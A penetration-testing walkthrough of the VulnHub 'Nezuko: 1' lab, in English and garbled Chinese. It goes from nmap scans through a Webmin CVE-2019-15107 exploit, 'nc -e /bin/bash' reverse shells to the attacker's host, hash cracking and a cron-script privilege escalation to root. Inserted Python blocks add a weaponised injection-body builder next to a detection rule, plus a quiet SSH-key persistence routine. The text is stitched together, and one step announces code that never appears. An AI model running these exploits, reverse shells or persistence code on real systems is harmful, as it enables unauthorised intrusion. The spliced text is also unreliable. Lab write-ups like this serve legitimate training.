VulnHub penetration-testing lab walkthrough: Nezuko: 1

靶場(chǎng)描述和提示:
Creator : @yunaranyancat (Twitter)
Difficulty : Easy ~ Intermediate
OS Used: Ubuntu 18.04
User : root, zenitsu, nezuko
Hashes : at their home directory
Task: obtain the hash stored in each of the three users' home directories.
1. Information gathering
Start with nmap (here driven from msfconsole via db_nmap so the results land in the workspace database):
msf5 > db_nmap -T4 10.1.1.0/24
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-28 16:38 CST
[*] Nmap: Nmap scan report for 10.1.1.1
[*] Nmap: Host is up (0.000061s latency).
[*] Nmap: Not shown: 999 closed ports
[*] Nmap: PORT   STATE SERVICE
[*] Nmap: 53/tcp open  domain
[*] Nmap: MAC Address: 00:50:56:E9:10:7F (VMware)
[*] Nmap: Nmap scan report for 10.1.1.129
[*] Nmap: Host is up (0.00054s latency).
[*] Nmap: Not shown: 998 closed ports
[*] Nmap: PORT   STATE SERVICE
[*] Nmap: 22/tcp open  ssh
[*] Nmap: 80/tcp open  http
[*] Nmap: MAC Address: 00:0C:29:4E:52:32 (VMware)
[*] Nmap: Nmap scan report for 10.1.1.254
[*] Nmap: Host is up (0.000047s latency).
[*] Nmap: All 1000 scanned ports on 10.1.1.254 are filtered
[*] Nmap: MAC Address: 00:50:56:FB:FE:72 (VMware)
[*] Nmap: Nmap scan report for 10.1.1.130
[*] Nmap: Host is up (0.0000060s latency).
[*] Nmap: Not shown: 999 closed ports
[*] Nmap: PORT   STATE SERVICE
[*] Nmap: 22/tcp open  ssh
[*] Nmap: Nmap done: 256 IP addresses (4 hosts up) scanned in 5.49 seconds
msf5 >
Excluding the VMware host-side addresses (10.1.1.1 and 10.1.1.254) and our own attacking machine (10.1.1.130), the target must be 10.1.1.129.
Probe that host in depth with nmap -p- -A target_ip (all 65535 TCP ports, plus version detection, OS detection, default scripts and traceroute):
msf5 > db_nmap -p- -A 10.1.1.129
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-28 16:42 CST
[*] Nmap: Nmap scan report for 10.1.1.129
[*] Nmap: Host is up (0.00060s latency).
[*] Nmap: Not shown: 65532 closed ports
[*] Nmap: PORT      STATE SERVICE VERSION
[*] Nmap: 22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
[*] Nmap: | ssh-hostkey:
[*] Nmap: |   2048 4b:f5:b3:ff:35:a8:c8:24:42:66:64:a4:4b:da:b0:16 (RSA)
[*] Nmap: |   256 2e:0d:6d:5b:dc:fe:25:cb:1b:a7:a0:93:20:3a:32:04 (ECDSA)
[*] Nmap: |_  256 bc:28:8b:e4:9e:8d:4c:c6:42:ab:0b:64:ea:8f:60:41 (ED25519)
[*] Nmap: 80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
[*] Nmap: |_http-server-header: Apache/2.4.29 (Ubuntu)
[*] Nmap: |_http-title: Welcome to my site! - nezuko kamado
[*] Nmap: 13337/tcp open  http    MiniServ 1.920 (Webmin httpd)
[*] Nmap: | http-robots.txt: 1 disallowed entry
[*] Nmap: |_/
[*] Nmap: |_http-title: Login to Webmin
[*] Nmap: MAC Address: 00:0C:29:4E:52:32 (VMware)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Linux 3.X|4.X
[*] Nmap: OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
[*] Nmap: OS details: Linux 3.2 - 4.9
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
[*] Nmap: TRACEROUTE
[*] Nmap: HOP RTT     ADDRESS
[*] Nmap: 1   0.60 ms 10.1.1.129
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 45.59 seconds
msf5 >
發(fā)現(xiàn)三個(gè)服務(wù)和端口是開(kāi)放的:
22
:SSH服務(wù)
、80
:HTTP服務(wù)
、13337
:Webmin服務(wù)
訪(fǎng)問(wèn)一下HTTP服務(wù)看看有什么東西:有一個(gè)畫(huà)風(fēng)有點(diǎn)詭異的動(dòng)畫(huà)(Nezuko是一個(gè)日本動(dòng)漫角色),和一句提示:“ Welcome to my site. I didn't put anything yet. Please come back again later ”,翻譯過(guò)來(lái)應(yīng)該是:“此地?zé)o銀三百兩”。我信你個(gè)鬼,你個(gè)糟老頭壞得很。
經(jīng)過(guò)一番探索,發(fā)現(xiàn)確實(shí)沒(méi)有什么可利用的點(diǎn)(老外挺實(shí)誠(chéng)的,說(shuō)沒(méi)有就真沒(méi)有)。
我們?cè)倏纯?13337
端口的Webmin
服務(wù):
2. Getting a shell
Nmap fingerprinted Webmin as version 1.920. A quick search (Google it) turns up:
Webmin 1.920 - Remote Code Execution (CVE-2019-15107)
https://www.exploit-db.com/exploits/47293
Run the PoC directly:
root@osboxes:/tmp# cat poc.sh
#!/bin/sh
#
# CVE-2019-15107 Webmin Unauthenticated Remote Command Execution
# based on Metasploit module https://www.exploit-db.com/exploits/47230
# Original advisory: https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
# Alternative advisory (spanish): https://blog.nivel4.com/noticias/vulnerabilidad-de-ejecucion-de-comandos-remotos-en-webmin
#
# Fernando A. Lagos B. (Zerial)
# https://blog.zerial.org
# https://blog.nivel4.com
#
# The script sends a flag by a echo command then grep it. If match, target is vulnerable.
#
# Usage: sh CVE-2019-15107.sh https://target:port
# Example: sh CVE-2019-15107.sh https://localhost:10000
# output: Testing for RCE (CVE-2019-15107) on https://localhost:10000: VULNERABLE!
#
FLAG="f3a0c13c3765137bcde68572707ae5c0"
URI=$1;
echo -n "Testing for RCE (CVE-2019-15107) on $URI: ";
# POST to password_change.cgi with expired=2 (the "change expired password" path).
# The 'old' field is the injection point; the command it carries is executed by
# the server and its output comes back in the response, so we look for the flag.
# -k: Webmin normally serves a self-signed certificate; -s: no progress output.
curl -ks $URI'/password_change.cgi' -d 'user=wheel&pam=&expired=2&old=id|echo '$FLAG'&new1=wheel&new2=wheel' -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' -H "Content-Type: application/x-www-form-urlencoded" -H 'Referer: '$URI'/session_login.cgi'|grep $FLAG>/dev/null 2>&1
if [ $? -eq 0 ];
then
        echo '\033[0;31mVULNERABLE!\033[0m'
else
        echo '\033[0;32mOK! (target is not vulnerable)\033[0m'
fi
#EOF
root@osboxes:/tmp# ./poc.sh https://10.1.1.129:13337
Testing for RCE (CVE-2019-15107) on https://10.1.1.129:13337: VULNERABLE!
root@osboxes:/tmp#
The PoC reports the target as vulnerable. (Per the Webmin advisory, versions 1.900 to 1.920 are only exploitable when the option to prompt users with expired passwords for a new one is enabled, which is the code path expired=2 drives; 1.890 was exploitable in its default configuration; the fix is 1.930.)
That makes things easy: let's get a reverse shell. Edit poc.sh and replace the echo '$FLAG' part of the injected command with nc -e /bin/bash attack_ip port. The two relevant lines then look like this:
Start an nc listener, run poc.sh again, and the shell comes back. Two things to keep in mind: the target's nc must support -e (it does on this box, but the netcat-openbsd build that Ubuntu installs by default does not), and because the grep at the end of the script can no longer match, poc.sh simply hangs after the colon for as long as the reverse shell is alive, which is exactly what you see below.
Terminal 1 (listener):
root@osboxes:/tmp# nc -lvp 7777
listening on [any] 7777 ...
10.1.1.129: inverse host lookup failed: Unknown host
connect to [10.1.1.130] from (UNKNOWN) [10.1.1.129] 51590
Terminal 2 (exploit):
root@osboxes:/tmp# ./poc.sh https://10.1.1.129:13337
Testing for RCE (CVE-2019-15107) on https://10.1.1.129:13337:
執(zhí)行一些常用命令,看看是什么權(quán)限?
root@osboxes:/tmp# nc -lvp 7777
listening on [any] 7777 ...
10.1.1.129: inverse host lookup failed: Unknown host
connect to [10.1.1.130] from (UNKNOWN) [10.1.1.129] 51590
id
uid=1000(nezuko) gid=1000(nezuko) groups=1000(nezuko),4(adm),24(cdrom),30(dip),46(plugdev),116(lpadmin),126(sambashare)
ls /
bin
boot
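Pasting a command raw into the PoC body, as done above, works for id|nc -e ... but breaks as soon as the command contains '&', '+', '#' or '%' (for example bash -i >& /dev/tcp/...), because Webmin's CGI parser splits the body on '&' and decodes '+' and '%xx'. The following is an added example, not code from the walkthrough or from the PoC's author: it builds the password_change.cgi body with correct form encoding, and beside it the matching detection rule a defender would run over request bodies (a POST that takes the expired=2 path while the 'old' field carries shell metacharacters). The flag value and the sample bodies are the ones from the page; nothing here touches the network.

```python
from urllib.parse import urlencode, parse_qs

# Characters that mean "a shell is being driven", not "a password".
SHELL_META = set("|;&`$()<>\n")


def webmin_pwchange_body(command, flag=None):
    """Form body that makes vulnerable Webmin execute `command` through the
    'old' (current password) field. expired=2 is required: only the
    expired-password path of password_change.cgi is affected. When a flag is
    given it is echoed after the command, PoC-style, so execution can be
    confirmed by grepping the response. Everything is percent-encoded, so the
    command may contain '&', '+', '%' or '#' safely."""
    old = command if flag is None else "%s|echo %s" % (command, flag)
    fields = [("user", "wheel"), ("pam", ""), ("expired", "2"),
              ("old", old), ("new1", "wheel"), ("new2", "wheel")]
    return urlencode(fields)          # quote_plus: '|' -> %7C, ' ' -> '+'


def looks_like_cve_2019_15107(body):
    """Detection rule for a single password_change.cgi request body.
    True when the request takes the expired-password branch and the 'old'
    field contains shell metacharacters. A genuine expired-password change
    whose old password contains '$' or '&' would also match, so treat it as a
    high-signal alert rather than a block rule."""
    q = parse_qs(body, keep_blank_values=True)
    if q.get("expired", [""])[0] != "2":
        return False
    old = q.get("old", [""])[0]
    return any(ch in SHELL_META for ch in old)


def triage(bodies):
    """Run the rule over several captured bodies (constructed for this
    example) and return the indexes that should be alerted on."""
    return [i for i, b in enumerate(bodies) if looks_like_cve_2019_15107(b)]


# Constructed sample traffic: the PoC body, the reverse-shell body from the
# modified PoC, and a legitimate expired-password change.
SAMPLES = [
    "user=wheel&pam=&expired=2&old=id|echo f3a0c13c3765137bcde68572707ae5c0&new1=wheel&new2=wheel",
    "user=wheel&pam=&expired=2&old=id|nc -e /bin/bash 10.1.1.130 7777&new1=wheel&new2=wheel",
    "user=alice&pam=&expired=2&old=Old%21Pass&new1=N3w-Pass&new2=N3w-Pass",
]

if __name__ == "__main__":
    print(webmin_pwchange_body("id", "f3a0c13c3765137bcde68572707ae5c0"))
    print("alerts:", triage(SAMPLES))
```

The builder deliberately keeps the exact field set and order of the original PoC, so a request generated with it is byte-for-byte what the curl line sends once you account for encoding; the only difference is that the payload survives form decoding intact.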
我們得到的一個(gè)普通用戶(hù):nezuko
的shell
升級(jí)為SSH
會(huì)話(huà),很簡(jiǎn)單,在攻擊機(jī)上生成一個(gè)ssh key
,然后寫(xiě)入到目標(biāo)機(jī)就能ssh
免密登錄了。
本地生成密鑰:
root@osboxes:/tmp# ssh-keygen -t rsa ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
Generating public/private rsa key pair. ? ? ? ? ? ? ? ? ? ? ? ? ? ?
Enter file in which to save the key (/root/.ssh/id_rsa): sshkey ? ?
Enter passphrase (empty for no passphrase): ? ? ? ? ? ? ? ? ? ? ? ?
Enter same passphrase again: ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
Your identification has been saved in sshkey. ? ? ? ? ? ? ? ? ? ? ?
Your public key has been saved in sshkey.pub. ? ? ? ? ? ? ? ? ? ? ?
The key fingerprint is: ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
SHA256:DDIRhslt7EUNR8P5py1hq1Q9CXN1nbk8s0XGBi+nAfo root@osboxes ? ?
The key's randomart image is: ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
+---[RSA 2048]----+ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
| . =+oo=+. ?..oo=| ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
| ?+.+...+.o... =*| ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
| ? oo.. ?..= .+++| ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
| ? ?.o o ?=.= ?X.| ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
| ? ? ? ?So *E.. =| ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
| ? ? ? ?. + . ?. | ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
| ? ? ? . . . ? ? | ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
| ? ? ? ?. ? ? ? ?| ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
| ? ? ? ? ? ? ? ? | ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
+----[SHA256]-----+ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
root@osboxes:/tmp# ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
復(fù)制公鑰內(nèi)容,在目標(biāo)機(jī)shell里面寫(xiě)入到authorized_keys
文件。
root@osboxes:/tmp# cat sshkey.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCyD+owxKMrS8dGHsh2Cct8SB6/60S6UsTy/K+eSexh1tC+cT6E9RjtUpbtFnyZBlm9ICmrBlrun0OR8UhoeA0/b8rbl8QZbsDYYj1wHGkrL8QrxzMypfaCUTRl/eu/ADyyvpGtjmxD0utNU56BUypXDYJIZbQ2VKx6FSwTbs0yrVNdiw6exrlF+louJKr28xb4t6+RAe1R/vGI/yAKHZFTlkpc7hz+B4w7F3kdDpg1YtiJslLAkYtbCU1pDvImjSltWHV6zrCQzyRbMya8F1kvEF4UhjTFmnsgCHJfvTXLt8uBBi1kS73fzEzMvlqZ+T/8cMIZdkCjew7/rzCVmshR root@osboxes
root@osboxes:/tmp#echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCyD+owxKMrS8dGHsh2Cct8SB6/60S6UsTy/K+eSexh1tC+cT6E9RjtUpbtFnyZBlm9ICmrBlrun0OR8UhoeA0/b8rbl8QZbsDYYj1wHGkrL8QrxzMypfaCUTRl/eu/ADyyvpGtjmxD0utNU56BUypXDYJIZbQ2VKx6FSwTbs0yrVNdiw6exrlF+louJKr28xb4t6+RAe1R/vGI/yAKHZFTlkpc7hz+B4w7F3kdDpg1YtiJslLAkYtbCU1pDvImjSltWHV6zrCQzyRbMya8F1kvEF4UhjTFmnsgCHJfvTXLt8uBBi1kS73fzEzMvlqZ+T/8cMIZdkCjew7/rzCVmshR root@osboxes" > /home/nezuko/.ssh/authorized_keys
然后ssh
連接:
root@osboxes:/tmp# ssh -i sshkey nezuko@10.1.1.129 //用密鑰登錄
The authenticity of host '10.1.1.129 (10.1.1.129)' can't be established.
ECDSA key fingerprint is SHA256:V+CV/i2363VkhS3dZOGMbavZHVA2zbsG5k0emqBTJZ4.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.1.1.129' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.18.0-15-generic x86_64)
* Documentation: ?https://help.ubuntu.com
* Management: ? ? https://landscape.canonical.com
* Support: ? ? ? ?https://ubuntu.com/advantage
* Canonical Livepatch is available for installation.
? - Reduce system reboots and improve kernel security. Activate at:
? ? https://ubuntu.com/livepatch
404 packages can be updated.
189 updates are security updates.
Your Hardware Enablement Stack (HWE) is supported until April 2023.
Last login: Wed Aug 21 01:12:52 2019
nezuko@ubuntu:~$ //登錄成功
登錄成功了。
如果你不想這么麻煩,直接用python -c 'import pty;pty.spawn("/bin/bash")'
實(shí)現(xiàn)一個(gè)shell
也可以。
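The bare echo "..." > ~/.ssh/authorized_keys used above has three failure modes a practitioner runs into: it fails when .ssh does not exist, it silently destroys any key the account already had, and it leaves permissions that sshd's StrictModes (on by default) rejects when the directory or file is group- or world-writable. The function below is an added example, not code from the walkthrough; it installs a key the way sshd actually wants it, idempotently, and checks the writability conditions that StrictModes enforces (ownership checks are out of scope here). The key line and home directory in demo() are constructed for the example.

```python
import os
import stat
import tempfile


def install_authorized_key(home, pubkey_line):
    """Append pubkey_line to <home>/.ssh/authorized_keys and return the path.
    Creates .ssh (0700) and the file (0600) as needed, keeps keys that are
    already present, and never adds the same line twice."""
    pubkey_line = pubkey_line.strip()
    if not pubkey_line.startswith(("ssh-", "ecdsa-", "sk-")):
        raise ValueError("not an OpenSSH public key line")
    ssh_dir = os.path.join(home, ".ssh")
    os.makedirs(ssh_dir, mode=0o700, exist_ok=True)
    os.chmod(ssh_dir, 0o700)          # makedirs honours umask; force the mode
    path = os.path.join(ssh_dir, "authorized_keys")
    existing = []
    if os.path.exists(path):
        with open(path) as f:
            existing = [line.strip() for line in f if line.strip()]
    if pubkey_line not in existing:
        with open(path, "a") as f:    # append: the owner's own keys survive
            f.write(pubkey_line + "\n")
    os.chmod(path, 0o600)
    return path


def authorized_keys_ok(home):
    """The writability part of sshd's StrictModes: neither .ssh nor
    authorized_keys may be group- or world-writable, or the key is ignored."""
    ssh_dir = os.path.join(home, ".ssh")
    path = os.path.join(ssh_dir, "authorized_keys")
    forbidden = stat.S_IWGRP | stat.S_IWOTH
    return all(not (os.stat(p).st_mode & forbidden) for p in (ssh_dir, path))


def demo():
    """Install the same key twice into a throwaway home directory and report
    what sshd would see. The key is a constructed line that reuses the prefix
    of the attacker's key from the walkthrough."""
    home = tempfile.mkdtemp(prefix="nezuko-home-")
    key = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCyD+owxKMrS8dGHsh2Cct8SB6 root@osboxes"
    path = install_authorized_key(home, key)
    install_authorized_key(home, key)       # second call must be a no-op
    with open(path) as f:
        keys = [line for line in f if line.strip()]
    return {"path": path, "keys": len(keys), "sshd_ok": authorized_keys_ok(home)}


if __name__ == "__main__":
    print(demo())
```

Dropping the key in with append semantics is also the less noisy option on an engagement: the legitimate user keeps working, and cleanup is a one-line removal rather than restoring a file you overwrote.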
3. Horizontal privilege escalation
Right now we hold an unprivileged shell, so let's think about escalation.
First, see what the current user can find out:
nezuko@ubuntu:~$ pwd
nezuko@ubuntu:~$ ls -l
total 24
drwxr-xr-x 2 nezuko nezuko ?4096 Ogos 28 21:45 from_zenitsu
-rw-rw-r-- 1 nezuko nezuko 19535 Ogos 21 00:25 nezuko.txt
Let's see what nezuko.txt contains:
nezuko@ubuntu:~$ cat nezuko.txt
Congratulations! You have found nezuko! Now, try to surpass your limit! Right here, right now...
(ASCII art omitted)
1af0941e0c4bd4564932184d47dd8bef
A hint, plus a hash string: that is one of the three hashes the box asks for.
Now the from_zenitsu directory:
nezuko@ubuntu:~/from_zenitsu$ ls -l
total 284
-rw-r--r-- 1 root root 54 Ogos 21 01:13 new_message_21-08-2019_01:13
-rw-r--r-- 1 root root 54 Ogos 21 09:11 new_message_21-08-2019_09:11
-rw-r--r-- 1 root root 54 Ogos 21 09:12 new_message_21-08-2019_09:12
....
-rw-r--r-- 1 root root 54 Ogos 28 21:35 new_message_28-08-2019_21:35
-rw-r--r-- 1 root root 54 Ogos 28 21:40 new_message_28-08-2019_21:40
-rw-r--r-- 1 root root 54 Ogos 28 21:45 new_message_28-08-2019_21:45
-rw-r--r-- 1 root root 54 Ogos 28 21:50 new_message_28-08-2019_21:50
-rw-r--r-- 1 root root 54 Ogos 28 21:55 new_message_28-08-2019_21:55
-rw-r--r-- 1 root root 54 Ogos 29 ?2019 new_message_29-08-2019_00:05
nezuko@ubuntu:~/from_zenitsu$
This is interesting: the files appear to be generated automatically, one every 5 minutes.
Let's read one at random:
nezuko@ubuntu:~/from_zenitsu$ cat new_message_29-08-2019_00\:05
nezuko chan, would you like to go on a date with me? // rather forward~~
nezuko@ubuntu:~/from_zenitsu$
So these files are presumably sent by the user zenitsu, yet every one of them is owned by root. That matters: whatever process writes them is running as root, not as zenitsu.
So let's move laterally to the zenitsu account and take a look.
First, check which users exist:
nezuko@ubuntu:~/from_zenitsu$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:111::/run/uuidd:/usr/sbin/nologin
avahi-autoipd:x:106:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
dnsmasq:x:108:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
rtkit:x:109:114:RealtimeKit,,,:/proc:/usr/sbin/nologin
cups-pk-helper:x:110:116:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:111:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
whoopsie:x:112:117::/nonexistent:/bin/false
kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:114:119::/var/lib/saned:/usr/sbin/nologin
pulse:x:115:120:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
avahi:x:116:122:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
colord:x:117:123:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
hplip:x:118:7:HPLIP system user,,,:/var/run/hplip:/bin/false
geoclue:x:119:124::/var/lib/geoclue:/usr/sbin/nologin
gnome-initial-setup:x:120:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:121:125:Gnome Display Manager:/var/lib/gdm3:/bin/false
nezuko:x:1000:1000:nezuko,,,:/home/nezuko:/bin/bash
zenitsu:$6$LbPWwHSD$69t89j0Podkdd8dk17jNKt6Dl2.QYwSJGIX0cE5nysr6MX23DFvIAwmxEHOjhBj8rBplVa3rqcVDO0001PY9G0:1001:1001:,,,:/home/zenitsu:/bin/bash
sshd:x:122:65534::/run/sshd:/usr/sbin/nologin
nezuko@ubuntu:~/from_zenitsu$
我們發(fā)現(xiàn)zenitsu
用戶(hù)的密碼hash
被直接寫(xiě)在里面了。
用John The Ripper
破解試試吧,找一個(gè)強(qiáng)大的字典,然后跑就是了
百度一下(Google it),找到一個(gè)字典合集:https://github.com/danielmiessler/SecLists
root@osboxes:/tmp# cat zenitsu_hash.txt
$6$LbPWwHSD$69t89j0Podkdd8dk17jNKt6Dl2.QYwSJGIX0cE5nysr6MX23DFvIAwmxEHOjhBj8rBplVa3rqcVDO0001PY9G0
root@osboxes:/tmp# john --wordlist=rockyou.txt zenitsu_hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
password         (?)
1g 0:00:00:01 DONE (2019-08-28 22:38) 0.5780g/s 4439p/s 4439c/s 4439C/s computador..escort
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@osboxes:/tmp# john zenitsu_hash.txt --show
?:password
1 password hash cracked, 0 left
root@osboxes:/tmp#
強(qiáng)大字典加持下,很快就破解出來(lái)了。我們切換到zenitsu
用戶(hù)看看吧
nezuko@ubuntu:~/from_zenitsu$ su - zenitsu
Password:
zenitsu@ubuntu:~$ pwd
/home/zenitsu
zenitsu@ubuntu:~$ id
uid=1001(zenitsu) gid=1001(zenitsu) groups=1001(zenitsu)
zenitsu@ubuntu:~$ ls -l
total 16
drwxr-xr-x 2 zenitsu root ? ?4096 Ogos 21 09:39 to_nezuko
-rw-rw-r-- 1 zenitsu zenitsu 9343 Ogos 21 00:28 zenitsu.txt
zenitsu@ubuntu:~$
看到有一個(gè)目錄是to_nezuko
,進(jìn)去看看吧
zenitsu@ubuntu:~$ cd to_nezuko/
zenitsu@ubuntu:~/to_nezuko$ ls -l
total 4
-rw-r--r-- 1 zenitsu root 150 Ogos 21 09:39 send_message_to_nezuko.sh
zenitsu@ubuntu:~/to_nezuko$
是一個(gè)腳本,可以看到這個(gè)腳本的權(quán)限是屬于zenitsu
用戶(hù)和root
組的,這個(gè)腳本的作用應(yīng)該就是發(fā)消息給nezuko
用戶(hù)。
看看腳本內(nèi)容吧:
zenitsu@ubuntu:~/to_nezuko$ cat send_message_to_nezuko.sh
#!/bin/bash
date=$(date '+%d-%m-%Y_%H:%M')
echo "nezuko chan, would you like to go on a date with me? " > /home/nezuko/from_zenitsu/new_message_$date zenitsu@ubuntu:~/to_nezuko$
沒(méi)錯(cuò),這個(gè)就是每隔5分鐘就給nezuko
發(fā)一條騷擾信息的腳本。
4. Getting a root shell
Putting the pieces together, this script must be executed as root, presumably from root's crontab on a five-minute schedule: that is the only explanation for why the files in nezuko's from_zenitsu directory are owned by root rather than by zenitsu. (We cannot read root's crontab as zenitsu, but the five-minute cadence of the timestamps and the root ownership are strong evidence.)
If so, any command we add to the script will be run as root, and that is our way to a root shell.
But when we open the file to edit it, vim cannot write it back:
"send_message_to_nezuko.sh" E212: Can't open file for writing
Press ENTER or type command to continue
Why not? The mode bits say we own it. Let's check for extended attributes:
zenitsu@ubuntu:~/to_nezuko$ lsattr send_message_to_nezuko.sh
-----a--------e--- send_message_to_nezuko.sh
zenitsu@ubuntu:~/to_nezuko$
The file carries the a (append-only) attribute, set with chattr +a and only clearable by a process with CAP_LINUX_IMMUTABLE, i.e. root. An append-only file can only be opened for appending: truncating it, overwriting it in place, deleting or renaming it all fail with EPERM, which is why vim's save (it rewrites the whole file) was refused. Appending with >> is still allowed, so we simply tack an nc reverse shell onto the end:
zenitsu@ubuntu:~/to_nezuko$ echo "nc -e /bin/bash 10.1.1.130 9999" >> send_message_to_nezuko.sh
zenitsu@ubuntu:~/to_nezuko$ cat send_message_to_nezuko.sh
#!/bin/bash
date=$(date '+%d-%m-%Y_%H:%M')
echo "nezuko chan, would you like to go on a date with me? " > /home/nezuko/from_zenitsu/new_message_$date
nc -e /bin/bash 10.1.1.130 9999
zenitsu@ubuntu:~/to_nezuko$
開(kāi)監(jiān)聽(tīng),等5分鐘:
root@osboxes:/tmp# nc -lvp 9999
listening on [any] 9999 ...
漫長(zhǎng)的5分鐘,可以去休息一下~~
五分鐘后,收到root shell
root@osboxes:/tmp# nc -lvp 9999
listening on [any] 9999 ...
10.1.1.129: inverse host lookup failed: Unknown host
connect to [10.1.1.130] from (UNKNOWN) [10.1.1.129] 36210
root@osboxes:/tmp# nc -lvp 9999
listening on [any] 9999 ...
10.1.1.129: inverse host lookup failed: Unknown host
connect to [10.1.1.130] from (UNKNOWN) [10.1.1.129] 36210
id
uid=0(root) gid=0(root) groups=0(root)
ls -l
total 8
-rw-r--r-- 1 root root 7190 Ogos 21 00:42 root.txt
cat root.txt
Congratulations on getting the root shell!
Tell me what do you think about this box at my twitter, @yunaranyancat
5、后記
在破密碼部分,也可以用hashcat
跑
反彈shell,也可以用msfvenom
生成。
最后的拿root權(quán)限,也可以試試修改可執(zhí)行命令的權(quán)限,來(lái)實(shí)現(xiàn),比如加suid
權(quán)限
6、參考資料
靶機(jī)環(huán)境下載:nezuko: 1 ~ VulnHub https://www.vulnhub.com/entry/nezuko-1,352/